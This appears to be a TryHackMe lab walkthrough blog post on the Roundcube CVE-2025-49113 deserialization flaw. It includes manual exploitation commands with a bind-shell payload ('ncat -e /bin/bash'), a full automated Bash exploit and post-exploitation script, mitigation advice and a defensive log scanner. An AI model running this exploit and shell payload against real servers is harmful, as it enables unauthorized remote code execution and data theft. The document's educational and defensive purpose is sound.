
Roundcube RCE Vulnerability Explained [CVE-2025-49113] - TryHackMe Walkthrough

Waseem Akram
Researcher, Pentester, Dev
2025-06-21

Introduction

Roundcube is a free and open-source webmail software used by thousands of hosting providers and organizations around the world. It supports more than 80 languages, is highly extensible, and integrates well with various SQL backends. But even the most trusted tools can have cracks in their armor.

Recently, a critical vulnerability (CVE-2025-49113) was discovered in Roundcube versions 1.5.x and 1.6.x (prior to 1.5.10 and 1.6.11). This flaw allows authenticated remote code execution (RCE) via insecure PHP object deserialization. With a CVSS score of 9.9, this vulnerability is a ticking time bomb for any unpatched installation.

In this blog post, we’ll:


  • Break down what causes this vulnerability
  • Walk through the manual exploitation
  • Showcase an automated exploit script
  • Provide insights from a TryHackMe-style vulnerable lab

What Is CVE-2025-49113?

The Root Cause

The vulnerability stems from the upload.php endpoint in Roundcube, which mishandles the _from parameter by deserializing it without validating whether it contains safe data. If an attacker provides malicious serialized PHP data, it gets deserialized and executed, leading to arbitrary code execution on the target.

Affected Versions

  • All 1.5.x before 1.5.10
  • All 1.6.x before 1.6.11

The issue was identified by Kirill Firsov, and the patch commits clearly show the added input validation: rcube_utils::is_simple_string() is now used to validate the _from parameter before it is used.


Manual Exploitation

Let’s walk through how this exploit works in a lab using TryHackMe:


Environment Setup

  • Roundcube version: 1.6.10
  • Credentials:
    • Username: ellieptic
    • Password: ChangeMe123
  • URL: http://MACHINE_IP/roundcube

Step-by-Step Exploitation

  1. Log in to Roundcube with the provided credentials.
  2. Clone the exploit PoC:
    git clone https://github.com/fearsoff-org/CVE-2025-49113
    cd CVE-2025-49113
  3. Inspect the script CVE-2025-49113.php. It:
    • retrieves a CSRF token and session cookie;
    • crafts a malicious serialized payload;
    • injects that payload into the _from parameter;
    • sends a POST request to upload.php.
  4. Launch the exploit:
    php CVE-2025-49113.php http://MACHINE_IP/roundcube ellieptic ChangeMe123 "ncat -lvnp 4444 -e /bin/bash"
  5. Connect via netcat:
    nc MACHINE_IP 4444
    If the screen hangs, that's a good sign. Type pwd and whoami to verify shell access.

Post-Exploitation Findings

Maggie's Last Name

You can find the user's details in /etc/passwd:

grep -i maggie /etc/passwd

Output:

maggie****:x:1002:1002:Maggie ****,,,:/home/maggie****:/bin/bash

Answer: Redacted


Flag Location

To find flags, try:

find /etc -type f -iname '*flag*' -exec cat {} +

Automating the Exploit

To speed things up, we created a fully automated Bash script that:

  • Clones the exploit
  • Runs it with a payload
  • Connects to the bind shell
  • Grabs Maggie’s last name
  • Dumps any /etc/ flag files

Script: roundcube_exploit.sh

The complete automated exploit script is available on GitHub (Download roundcube-exploit.sh) and is reproduced in full below.


#!/bin/bash
 
# Roundcube CVE-2025-49113 Exploit + Post Exploitation Automation
# Author: Waseem Akram(hackerwasii)
# Purpose: Shell, sniff Maggie, snag the flag
 
# ----------------------------
# CONFIGURATION
# ----------------------------
MACHINE_IP="$1"
USERNAME="username"  # Replace with actual username
PASSWORD="password"  # Replace with actual password
PORT=4444
EXPLOIT_DIR="CVE-2025-49113"
EXPLOIT_REPO="https://github.com/fearsoff-org/CVE-2025-49113.git"
EXPLOIT_FILE="CVE-2025-49113.php"
TARGET_URL="http://$MACHINE_IP/roundcube"
SHELL_PAYLOAD="ncat -lvnp $PORT -e /bin/bash"
 
# ----------------------------
# PRECHECKS
# ----------------------------
if [ -z "$MACHINE_IP" ]; then
  echo "[!] Usage: $0 <MACHINE_IP>"
  exit 1
fi
 
for tool in php git nc grep; do
  if ! command -v $tool &>/dev/null; then
    echo "[!] Missing required tool: $tool"
    exit 2
  fi
done
 
echo "[*] Launching exploit on Roundcube at $TARGET_URL..."
 
# ----------------------------
# CLONE EXPLOIT REPO
# ----------------------------
if [ ! -d "$EXPLOIT_DIR" ]; then
  echo "[*] Cloning PoC repo..."
  git clone "$EXPLOIT_REPO" || { echo "[!] Git clone failed."; exit 3; }
fi
 
cd "$EXPLOIT_DIR" || exit
 
# ----------------------------
# RUN EXPLOIT
# ----------------------------
echo "[*] Executing exploit..."
php "$EXPLOIT_FILE" "$TARGET_URL" "$USERNAME" "$PASSWORD" "$SHELL_PAYLOAD" &
EXPLOIT_PID=$!
 
# ----------------------------
# WAIT FOR BIND SHELL TO SPAWN
# ----------------------------
sleep 6
 
echo "[*] Connecting to bind shell on port $PORT..."
(
  sleep 1
  echo "whoami"
  sleep 1
  echo "pwd"
  sleep 1
  echo "echo '[*] Searching /etc/passwd for Maggie...'"
  echo "grep -i maggie /etc/passwd"
  sleep 1
  echo "echo '[*] Searching for flags in /etc...'"
  echo "find /etc -type f -iname '*flag*' 2>/dev/null | while read f; do echo \"--- Flag in: \$f ---\"; cat \"\$f\"; done"
  sleep 1
  echo "echo '[*] Done. Ride safe, partner.'"
  sleep 2
) | nc "$MACHINE_IP" "$PORT"
 
# ----------------------------
# CLEANUP
# ----------------------------
kill $EXPLOIT_PID &>/dev/null
 
echo "[*] Script complete. If you saw Maggie’s last name and the flag, yer good to ride off into the sunset."
echo "[*] Remember to patch Roundcube ASAP!"
exit 0
# End of script

Mitigation & Recommendations

  • Patch Immediately: Upgrade to 1.5.10 or 1.6.11.
  • Disable upload.php if the feature is unused.
  • Monitor traffic to upload.php for _from values that are not simple strings, for example values carrying serialized PHP data.
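The allowlist check the patch adds and the monitoring recommendation above, as an added Python example (not Roundcube's code and not the post's exploit script). It approximates rcube_utils::is_simple_string() with a short alphanumeric regex (an assumption; Roundcube's exact rule is not reproduced), then scans constructed Apache-style access-log lines for upload.php requests whose _from value fails that check or carries a PHP object-serialization marker. It assumes _from appears in the logged query string; a value sent in the POST body is only visible in a proxy or WAF log that records request bodies.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: an approximation of the allowlist rcube_utils::is_simple_string()
# enforces in the fix. Roundcube's exact rule is not reproduced here; the point
# is that a serialized PHP payload can never pass a "simple string" allowlist.
SIMPLE_STRING = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")

# Marker of a serialized PHP object: O:<name length>:"<class name>":
PHP_OBJECT_MARKER = re.compile(r'O:\d+:"')

# Apache/Nginx combined-format request line; only the fields we need are named.
ACCESS_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_simple_string(value: str) -> bool:
    """Allowlist check that a legitimate _from value (e.g. 'compose') passes."""
    return SIMPLE_STRING.fullmatch(value) is not None


def classify_from(value: str):
    """Return None for an accepted value, otherwise a short reason string."""
    if is_simple_string(value):
        return None
    if PHP_OBJECT_MARKER.search(value):
        return "php-object-marker"
    return "not-simple-string"


def suspicious_upload_requests(log_text: str):
    """Return (ip, timestamp, decoded _from, reason) for every upload.php request
    whose _from query parameter fails the simple-string check.
    Only the query string is inspected; a _from sent in a POST body is not
    visible in a standard access log."""
    findings = []
    for line in log_text.splitlines():
        m = ACCESS_LINE.match(line)
        if not m:
            continue                      # not a request line we understand
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/upload.php"):
            continue                      # only the vulnerable endpoint
        # parse_qs percent-decodes values, so O%3A8%3A%22... becomes O:8:"...
        for value in parse_qs(url.query, keep_blank_values=True).get("_from", []):
            reason = classify_from(value)
            if reason:
                findings.append((m.group("ip"), m.group("ts"), value, reason))
    return findings


# Constructed sample log (not real traffic). Line 3 carries a harmless dummy
# serialized object, O:8:"Demo_Obj":0:{}, percent-encoded as a client would.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Jun/2025:10:00:01 +0000] "POST /roundcube/upload.php?_from=compose HTTP/1.1" 200 512
10.0.0.5 - - [21/Jun/2025:10:00:02 +0000] "GET /roundcube/program/js/app.min.js HTTP/1.1" 200 90210
10.0.0.9 - - [21/Jun/2025:10:00:03 +0000] "POST /roundcube/upload.php?_from=O%3A8%3A%22Demo_Obj%22%3A0%3A%7B%7D HTTP/1.1" 200 1024
10.0.0.7 - - [21/Jun/2025:10:00:04 +0000] "POST /roundcube/upload.php?_from=compose%20%27x HTTP/1.1" 200 1024
"""

if __name__ == "__main__":
    for ip, ts, value, reason in suspicious_upload_requests(SAMPLE_LOG):
        print(f"{ts} {ip} _from={value!r} -> {reason}")
```

Run against the sample, the scan reports the object-marker request from 10.0.0.9 and the non-simple value from 10.0.0.7, while the legitimate _from=compose request and the static asset fetch are ignored. The same classify_from() logic is what a patched server applies on input; running it over logs lets you look back for attempts made before the upgrade.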

Final Thoughts

This vulnerability is a great example of how dangerous PHP object deserialization can be when mishandled. While the exploit requires valid credentials, many shared hosting environments with weak passwords could be easily compromised.

Always audit your dependencies, stay updated, and sanitize all user inputs, especially those being deserialized.


Quick Recap for TryHackMe Users

  1. Log in as ellieptic
  2. Clone & run the exploit
  3. Connect via netcat
  4. Dump /etc/passwd for Maggie's last name
  5. Read the flag from /etc/

If you found this post helpful, please share it with your network. Together, we can make the web a safer place!
